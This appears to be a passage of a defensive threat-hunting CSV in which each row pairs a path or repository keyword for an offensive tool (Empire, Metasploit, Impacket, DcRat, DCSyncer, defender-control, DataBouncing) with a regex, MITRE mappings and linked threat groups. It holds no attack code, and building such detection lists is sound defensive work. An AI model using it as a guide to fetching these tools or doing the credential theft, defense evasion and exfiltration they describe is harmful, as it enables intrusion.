"*/data/empire.orig.key*",".{0,1000}\/data\/empire\.orig\.key.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","6430"
"*/data/exploits/*",".{0,1000}\/data\/exploits\/.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","6431"
"*/data/nxc.conf*",".{0,1000}\/data\/nxc\.conf.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#linux","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","6432"
"*/data/payload.log*",".{0,1000}\/data\/payload\.log.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","#linux","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","6433"
"*/data/shellcode*",".{0,1000}\/data\/shellcode.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","6434"
"*/DataBouncing.git*",".{0,1000}\/DataBouncing\.git.{0,1000}","offensive_tool_keyword","DataBouncing","Data Bouncing is a technique for transmitting data between two endpoints using DNS lookups and HTTP header manipulation","T1048 - T1041","TA0010","N/A","N/A","Data Exfiltration","https://github.com/Unit-259/DataBouncing","1","1","N/A","N/A","9","1","15","0","2025-03-12T07:34:04Z","2025-03-12T06:58:51Z","6435"
"*/DavRelayUp.git*",".{0,1000}\/DavRelayUp\.git.{0,1000}","offensive_tool_keyword","DavRelayUp","DavRelayUp - a universal no-fix local privilege escalation in domain-joined windows workstations where LDAP signing is not enforced","T1078 - T1078.004 - T1068","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/ShorSec/DavRelayUp","1","1","N/A","N/A","9","6","542","81","2023-06-05T09:17:06Z","2023-06-05T07:49:39Z","6441"
"*/DavRelayUp/*",".{0,1000}\/DavRelayUp\/.{0,1000}","offensive_tool_keyword","DavRelayUp","DavRelayUp - a universal no-fix local privilege escalation in domain-joined windows workstations where LDAP signing is not enforced","T1078 - T1078.004 - T1068","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/ShorSec/DavRelayUp","1","1","N/A","N/A","9","6","542","81","2023-06-05T09:17:06Z","2023-06-05T07:49:39Z","6442"
"*/daytime.nse*",".{0,1000}\/daytime\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","6443"
"*/dazzleUP.git*",".{0,1000}\/dazzleUP\.git.{0,1000}","offensive_tool_keyword","dazzleUP","A tool that detects the privilege escalation vulnerabilities caused by misconfigurations and missing updates in the Windows operating systems.","T1068 - T1088 - T1210 - T1210.002","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/hlldz/dazzleUP","1","1","N/A","N/A","9","5","490","69","2020-07-23T08:48:43Z","2020-07-21T21:06:46Z","6444"
"*/dazzleUP_Reflective_DLL.x64.dll*",".{0,1000}\/dazzleUP_Reflective_DLL\.x64\.dll.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","6445"
"*/db/dnskire.db*",".{0,1000}\/db\/dnskire\.db.{0,1000}","offensive_tool_keyword","dnskire","A tool for file infiltration over DNS","T1071.004 - T1071.001 - T1048","TA0010 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/0xtosh/dnskire","1","0","#linux","N/A","7","1","17","0","2023-12-07T21:42:34Z","2022-09-10T17:56:30Z","6446"
"*/db2_default_userpass.txt*",".{0,1000}\/db2_default_userpass\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","6447"
"*/db2-das-info.nse*",".{0,1000}\/db2\-das\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","6448"
"*/dbc2Loader*",".{0,1000}\/dbc2Loader.{0,1000}","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","BlackCat - Scattered Spider*","C2","https://github.com/Arno0x/DBC2","1","1","N/A","N/A","10","10","295","86","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z","6449"
"*/DBC-Server.py*",".{0,1000}\/DBC\-Server\.py.{0,1000}","offensive_tool_keyword","dns-black-cat","Multi platform toolkit for an interactive DNS shell commands exfiltration - by using DNS-Cat you will be able to execute system commands in shell mode over DNS protocol","T1140 - T1048.003 - T1071.004","TA0011 - TA0040 - TA0001","N/A","N/A","C2","https://github.com/lawrenceamer/dns-black-cat","1","1","N/A","N/A","10","10","114","20","2022-09-15T18:07:05Z","2021-02-13T11:31:22Z","6450"
"*/dbms/fingerprint.py*",".{0,1000}\/dbms\/fingerprint\.py.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Vulnerability Scanner","https://github.com/r0oth3x49/ghauri","1","0","#linux","N/A","8","10","3483","361","2025-02-25T19:09:50Z","2022-10-01T11:21:50Z","6451"
"*/dbsclrxcvg/b.js*",".{0,1000}\/dbsclrxcvg\/b\.js.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","0","N/A","N/A","10","1","N/A","N/A","N/A","N/A","6452"
"*/DCOM Lateral Movement/*",".{0,1000}\/DCOM\sLateral\sMovement\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of beacon BOF written to learn windows and cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Yaxser/CobaltStrike-BOF","1","1","N/A","N/A","10","10","347","57","2023-02-24T13:12:14Z","2020-10-08T01:12:41Z","6453"
"*/dcomexec.exe*",".{0,1000}\/dcomexec\.exe.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","6454"
"*/dcomexec.py*",".{0,1000}\/dcomexec\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","6455"
"*/dcomhijack.cna*",".{0,1000}\/dcomhijack\.cna.{0,1000}","offensive_tool_keyword","dcomhijack","Lateral Movement Using DCOM with impacket and DLL Hijacking","T1570 - T1021.003 - T1574.001 - T1574.002","TA0008 - TA0003 - TA0005","N/A","N/A","Lateral Movement","https://github.com/WKL-Sec/dcomhijack","1","1","N/A","N/A","7","3","290","24","2023-06-18T20:34:03Z","2023-06-17T20:23:24Z","6456"
"*/dcomhijack.git*",".{0,1000}\/dcomhijack\.git.{0,1000}","offensive_tool_keyword","dcomhijack","Lateral Movement Using DCOM and DLL Hijacking","T1021 - T1021.003 - T1574 - T1574.007 - T1574.002","TA0008 - TA0005 - TA0002","N/A","N/A","Lateral Movement","https://github.com/WKL-Sec/dcomhijack","1","1","N/A","N/A","10","3","290","24","2023-06-18T20:34:03Z","2023-06-17T20:23:24Z","6457"
"*/dcomhijack.git*",".{0,1000}\/dcomhijack\.git.{0,1000}","offensive_tool_keyword","dcomhijack","Lateral Movement Using DCOM with impacket and DLL Hijacking","T1570 - T1021.003 - T1574.001 - T1574.002","TA0008 - TA0003 - TA0005","N/A","N/A","Lateral Movement","https://github.com/WKL-Sec/dcomhijack","1","1","N/A","N/A","7","3","290","24","2023-06-18T20:34:03Z","2023-06-17T20:23:24Z","6458"
"*/dcomhijack.py*",".{0,1000}\/dcomhijack\.py.{0,1000}","offensive_tool_keyword","dcomhijack","Lateral Movement Using DCOM with impacket and DLL Hijacking","T1570 - T1021.003 - T1574.001 - T1574.002","TA0008 - TA0003 - TA0005","N/A","N/A","Lateral Movement","https://github.com/WKL-Sec/dcomhijack","1","1","N/A","N/A","7","3","290","24","2023-06-18T20:34:03Z","2023-06-17T20:23:24Z","6459"
"*/DCOMPotato.git*",".{0,1000}\/DCOMPotato\.git.{0,1000}","offensive_tool_keyword","DCOMPotato","Service DCOM Object and SeImpersonatePrivilege abuse.","T1548.002 - T1134.002","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/zcgonvh/DCOMPotato","1","1","N/A","N/A","10","4","356","48","2022-12-09T01:57:53Z","2022-12-08T14:56:13Z","6460"
"*/DCOMUploadExec.exe*",".{0,1000}\/DCOMUploadExec\.exe.{0,1000}","offensive_tool_keyword","DCOMUploadExec","DCOM Lateral movement POC abusing the IMsiServer interface - uploads and executes a payload remotely","T1021.003 - T1570 - T1105 - T1569.002","TA0008 - TA0011 - TA0002","N/A","N/A","Lateral Movement","https://github.com/deepinstinct/DCOMUploadExec","1","1","N/A","N/A","9","4","357","52","2024-12-13T14:03:12Z","2024-11-13T16:05:29Z","6461"
"*/DCOMUploadExec.git*",".{0,1000}\/DCOMUploadExec\.git.{0,1000}","offensive_tool_keyword","DCOMUploadExec","DCOM Lateral movement POC abusing the IMsiServer interface - uploads and executes a payload remotely","T1021.003 - T1570 - T1105 - T1569.002","TA0008 - TA0011 - TA0002","N/A","N/A","Lateral Movement","https://github.com/deepinstinct/DCOMUploadExec","1","1","N/A","N/A","9","4","357","52","2024-12-13T14:03:12Z","2024-11-13T16:05:29Z","6462"
"*/dControl.exe*",".{0,1000}\/dControl\.exe.{0,1000}","offensive_tool_keyword","defender-control","disable windows defender permanently","T1562.001 - T1562.004 - T1089","TA0005 - TA0002","N/A","LockBit","Defense Evasion","https://www.sordum.org/9480/defender-control-v2-1/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","6463"
"*/dControl.rar*",".{0,1000}\/dControl\.rar.{0,1000}","offensive_tool_keyword","defender-control","disable windows defender permanently","T1562.001 - T1562.004 - T1089","TA0005 - TA0002","N/A","LockBit","Defense Evasion","https://www.sordum.org/9480/defender-control-v2-1/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","6464"
"*/DcRat.git*",".{0,1000}\/DcRat\.git.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","1","N/A","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","6465"
"*/DcRat.sln*",".{0,1000}\/DcRat\.sln.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","1","N/A","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","6466"
"*/DcRat/releases/download/*",".{0,1000}\/DcRat\/releases\/download\/.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","1","N/A","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","6467"
"*/dcrypt.exe*",".{0,1000}\/dcrypt\.exe.{0,1000}","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","1","N/A","N/A","10","5","499","108","2024-07-03T10:05:01Z","2019-04-20T14:51:18Z","6468"
"*/dcrypt_setup.exe*",".{0,1000}\/dcrypt_setup\.exe.{0,1000}","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","1","N/A","N/A","10","5","499","108","2024-07-03T10:05:01Z","2019-04-20T14:51:18Z","6469"
"*/dcshadow.html*",".{0,1000}\/dcshadow\.html.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","6470"
"*/dcsync_*.txt",".{0,1000}\/dcsync_.{0,1000}\.txt","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","6471"
"*/DCSyncer.git*",".{0,1000}\/DCSyncer\.git.{0,1000}","offensive_tool_keyword","DCSyncer","Perform DCSync operation","T1003.006","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/notsoshant/DCSyncer","1","1","N/A","N/A","10","2","143","22","2024-11-05T20:03:27Z","2020-06-06T17:20:22Z","6472"
"*/DCSyncer/releases/download/*",".{0,1000}\/DCSyncer\/releases\/download\/.{0,1000}","offensive_tool_keyword","DCSyncer","Perform DCSync operation","T1003.006","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/notsoshant/DCSyncer","1","1","N/A","N/A","10","2","143","22","2024-11-05T20:03:27Z","2020-06-06T17:20:22Z","6473"
"*/DCSyncer/tarball/*",".{0,1000}\/DCSyncer\/tarball\/.{0,1000}","offensive_tool_keyword","DCSyncer","Perform DCSync operation","T1003.006","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/notsoshant/DCSyncer","1","1","N/A","N/A","10","2","143","22","2024-11-05T20:03:27Z","2020-06-06T17:20:22Z","6474"
"*/DCSyncer/zipball/*",".{0,1000}\/DCSyncer\/zipball\/.{0,1000}","offensive_tool_keyword","DCSyncer","Perform DCSync operation","T1003.006","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/notsoshant/DCSyncer","1","1","N/A","N/A","10","2","143","22","2024-11-05T20:03:27Z","2020-06-06T17:20:22Z","6475"
"*/DDexec.git*",".{0,1000}\/DDexec\.git.{0,1000}","offensive_tool_keyword","Ddexec","A technique to run binaries filelessly and stealthily on Linux by ""overwriting"" the shell's process with another.","T1055.008 - T1106 - T1059.004","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/arget13/DDexec","1","1","#linux","N/A","9","9","830","88","2025-03-21T17:51:04Z","2022-01-27T12:52:10Z","6476"
"*/ddexec.sh*",".{0,1000}\/ddexec\.sh.{0,1000}","offensive_tool_keyword","Ddexec","A technique to run binaries filelessly and stealthily on Linux by ""overwriting"" the shell's process with another.","T1055.008 - T1106 - T1059.004","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/arget13/DDexec","1","0","#linux","N/A","9","9","830","88","2025-03-21T17:51:04Z","2022-01-27T12:52:10Z","6477"
"*/ddsc.sh *",".{0,1000}\/ddsc\.sh\s.{0,1000}","offensive_tool_keyword","Ddexec","A technique to run binaries filelessly and stealthily on Linux by ""overwriting"" the shell's process with another.","T1055.008 - T1106 - T1059.004","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/arget13/DDexec","1","0","#linux","N/A","9","9","830","88","2025-03-21T17:51:04Z","2022-01-27T12:52:10Z","6478"
"*/DDSpoof.git*",".{0,1000}\/DDSpoof\.git.{0,1000}","offensive_tool_keyword","DDSpoof","DDSpoof is a tool that enables DHCP DNS Dynamic Update attacks against Microsoft DHCP servers in AD environments.","T1557 - T1584 - T1203","TA0005 - TA0003 TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/akamai/DDSpoof","1","1","N/A","N/A","9","2","122","13","2024-04-12T22:06:02Z","2023-12-14T06:47:45Z","6479"
"*/ddspoof.py*",".{0,1000}\/ddspoof\.py.{0,1000}","offensive_tool_keyword","DDSpoof","DDSpoof is a tool that enables DHCP DNS Dynamic Update attacks against Microsoft DHCP servers in AD environments.","T1557 - T1584 - T1203","TA0005 - TA0003 TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/akamai/DDSpoof","1","1","N/A","N/A","9","2","122","13","2024-04-12T22:06:02Z","2023-12-14T06:47:45Z","6480"
"*/deadPool.ps1*",".{0,1000}\/deadPool\.ps1.{0,1000}","offensive_tool_keyword","DataBouncing","Data Bouncing is a technique for transmitting data between two endpoints using DNS lookups and HTTP header manipulation","T1048 - T1041","TA0010","N/A","N/A","Data Exfiltration","https://github.com/Unit-259/DataBouncing","1","1","N/A","N/A","9","1","15","0","2025-03-12T07:34:04Z","2025-03-12T06:58:51Z","6481"
"*/DeadPotato.git*",".{0,1000}\/DeadPotato\.git.{0,1000}","offensive_tool_keyword","DeadPotato","DeadPotato is a windows privilege escalation utility from the Potato family of exploits leveraging the SeImpersonate right to obtain SYSTEM privileges","T1134.001 - T1068  - T1055 - T1546.015","TA0004 - TA0006 - TA0011","N/A","N/A","Privilege Escalation","https://github.com/lypd0/DeadPotato","1","1","N/A","N/A","10","4","382","45","2024-08-17T06:08:29Z","2024-07-31T01:08:30Z","6482"
"*/Deamond RAT 1.2/*",".{0,1000}\/Deamond\sRAT\s1\.2\/.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","6483"
"*/DeathStar/DeathStar.py*",".{0,1000}\/DeathStar\/DeathStar\.py.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","#linux","N/A","10","10","1190","163","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z","6484"
"*/deb.parrot.sh/*",".{0,1000}\/deb\.parrot\.sh\/.{0,1000}","offensive_tool_keyword","parrot os","Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.","T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105","TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation OS","https://www.parrotsec.org/download/","1","1","#linux","N/A","N/A","N/A","N/A","N/A","N/A","N/A","6485"
"*/debian/dns2tcp*",".{0,1000}\/debian\/dns2tcp.{0,1000}","offensive_tool_keyword","dns2tcp","Dns2tcp is a tool for relaying TCP connections over DNS","T1071.004 - T1048.003","TA0011 - TA0001","N/A","N/A","C2","https://github.com/alex-sector/dns2tcp","1","0","#linux","N/A","10","10","191","60","2024-06-08T09:40:52Z","2017-11-23T11:19:53Z","6486"
"*/DebugAmsi.git*",".{0,1000}\/DebugAmsi\.git.{0,1000}","offensive_tool_keyword","DebugAmsi","DebugAmsi is another way to bypass AMSI through the Windows process debugger mechanism.","T1562.001 - T1050.005","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/MzHmO/DebugAmsi","1","1","N/A","N/A","10","1","97","22","2023-09-18T17:17:26Z","2023-08-28T07:32:54Z","6487"
